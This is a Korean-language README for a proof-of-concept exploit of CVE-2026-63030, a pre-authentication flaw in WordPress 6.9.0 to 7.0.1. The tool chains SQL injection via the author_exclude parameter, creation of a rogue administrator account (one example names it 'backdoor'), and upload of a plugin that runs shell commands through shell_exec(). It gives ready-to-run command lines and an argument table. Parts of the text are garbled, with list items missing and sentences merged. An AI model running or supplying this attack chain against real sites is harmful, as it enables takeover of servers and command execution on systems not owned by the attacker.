
CVE-2026-63030에 대한 개념 증명(PoC) 익스플로잇으로, WordPress 6.9.0~7.0.1 버전에 존재하는 사전 인증 취약점입니다.
CVE-2026-63030에 대한 개념 증명(PoC) 익스플로잇입니다. WordPress(버전 6.9.0 ~ 7.0.1)의 사전 인증(pre-authentication) 취약점으로, 다음을 연쇄적으로 사용합니다:
author_exclude 파라미터를 통한 SQL 인젝션python3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
| 인자 | 설명 |
|---|---|
--url | 대상 WordPress 루트 URL(필수) |
--username | 생성할 관리자 사용자 이름(생략 시 자동 생성) |
--password | 관리자 비밀번호(생략 시 자동 생성) |
--email | 관리자 이메일(생략 시 자동 생성) |
--command, -c | 플러그인을 통해 실행할 명령(기본값: id) |
--post-id | 게시된 글 ID 지정(생략 시 자동 감지) |
--timeout | HTTP 타임아웃(초 단위, 기본값: 60) |
# Auto-exploit with random admin credentials and run 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Custom admin and command
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude 파라미터가 포함된 조작된 배치 요청을 보내 라우트 혼동을 악용하여 UNION 쿼리를 실행합니다.shell_exec()를 통해 시스템 명령을 실행하는 최소 플러그인을 업로드합니다.이것은 개념 증명(PoC)용입니다.
다음과 같은 용도로만 사용해야 합니다:
소유하지 않았거나 테스트에 대한 명시적인 서면 허가를 받지 않은 시스템에는 사용하지 마십시오. 작성자는 오용에 대한 책임을 지지 않습니다.
wp-config.php가 하드닝된 경우 SQLi가 실패할 수 있습니다.DISALLOW_FILE_MODS 및 DISALLOW_UNFILTERED_HTML을 비활성화하십시오.